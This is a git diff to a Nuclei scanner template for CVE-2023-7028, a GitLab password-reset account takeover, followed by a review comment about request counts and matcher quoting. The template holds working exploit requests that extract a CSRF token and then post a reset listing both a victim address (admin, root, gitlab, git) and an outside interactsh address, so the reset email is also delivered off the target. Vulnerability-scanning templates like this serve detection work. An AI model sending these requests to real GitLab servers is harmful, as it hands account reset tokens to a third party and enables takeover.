misc updates
parent
aab1f47ba1
commit
16b6079a48
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2023-7028
|
||||
|
||||
info:
|
||||
name: GitLab Account Takeover via Password Reset without user interactions
|
||||
name: GitLab - Account Takeover via Password Reset
|
||||
author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
|
@ -9,6 +9,13 @@ info:
|
|||
reference:
|
||||
- https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
|
||||
- https://x.com/rwincey/status/1745659710089437368?s=20
|
||||
- https://gitlab.com/gitlab-org/gitlab/-/issues/436084
|
||||
- https://hackerone.com/reports/2293343
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2023-7028
|
||||
cwe-id: CWE-284
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
|
@ -16,9 +23,9 @@ info:
|
|||
product: gitlab
|
||||
shodan-query: title:"Gitlab"
|
||||
tags: cve,cve2023,gitlab,auth-bypass
|
||||
|
||||
flow: |
|
||||
http(1);
|
||||
set("token", template["token"][0]);
|
||||
http(2);
|
||||
|
||||
http:
|
||||
|
@ -27,25 +34,8 @@ http:
|
|||
GET /users/sign_in HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout: 30s
|
||||
POST /users/password HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Referer: {{RootURL}}/users/password/new
|
||||
|
||||
authenticity_token={{token}}&user[email][]=admin@example.com&user[email][]=nuclei@{{interactsh-url}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(interactsh_protocol, 'smtp')"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: token
|
||||
group: 1
|
||||
regex:
|
||||
|
@ -54,24 +44,29 @@ http:
|
|||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 30s
|
||||
@timeout: 20s
|
||||
POST /users/password HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Referer: {{RootURL}}/users/password/new
|
||||
|
||||
authenticity_token={{token}}&user[email][]={{username}}@{{RDN}}&user[email][]=nuclei@{{interactsh-url}}
|
||||
authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
- root
|
||||
- gitlab
|
||||
- git
|
||||
- admin@example.com
|
||||
- admin@{{RDN}}
|
||||
- root@{{RDN}}
|
||||
- gitlab@{{RDN}}
|
||||
- git@{{RDN}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(interactsh_protocol, 'smtp')"
|
||||
- contains(interactsh_protocol, 'smtp')
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- username
|
||||
|
|
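Review bot: `max-request: 2` in the first hunk no longer matches what the template sends: the second raw request now iterates nine `username` payloads, so a run issues one sign-in GET plus nine password-reset POSTs, ten in total (by my count of the `payloads` block, with `flow` running `http(2)` under the payload loop). Update it to `max-request: 10` so anyone sizing a scan, or correlating a burst of GitLab reset emails with this template, sees the real volume; the same count also drives how many reset mails the target's admin addresses receive per run, which is worth stating in `description`. Separately, the rewritten matcher `- contains(interactsh_protocol, 'smtp')` drops the quotes that the identical matcher on the first request keeps; writing `- "contains(interactsh_protocol, 'smtp')"` in both places keeps the file's quoting style consistent.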